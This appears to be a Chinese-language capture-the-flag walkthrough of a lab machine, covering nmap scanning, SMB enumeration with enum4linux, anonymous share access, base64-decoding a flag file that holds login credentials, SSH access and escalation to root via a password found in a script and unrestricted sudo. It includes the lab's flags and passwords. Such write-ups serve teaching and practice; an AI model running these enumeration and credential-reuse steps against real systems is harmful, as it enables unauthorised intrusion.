信息收集
靶机扫描
nmap 192.168.93.0/24
端口开放了,22、80、139、445
目录扫描,没什么信息
网址访问
源码查看,没有发现什么信息
80端口没发现,从139和445这两个smb服务入手,枚举用户、查找共享文件夹
enum4linux 192.168.93.165
这里看到有一个 wave 共享,访问一下,需要密码,扫描结果中有很多显示空密码,空密码连接成功
smbclient //192.168.93.165/wave
查看当前目录下文件,看到一个 flag.txt ,下载下来查看
get FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
base64解码,得到 flag 1 ,以及一个账号密码
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open
获取shell
ssh连接
ssh wavex@192.168.93.165
提权
查看当前权限,suid、sudo等都没有可利用的
查看文件内容,得到 aveng 用户的密码
cat /usr/share/av/westsidesecret/ififoregt.sh
aveng:kaizen+80
切换用户到 aveng
su aveng
kaizen+80
sudo -l 查看
显示为 all ,直接 sudo su 提权,提权成功
在 /root 下发现 flag2 ,查看内容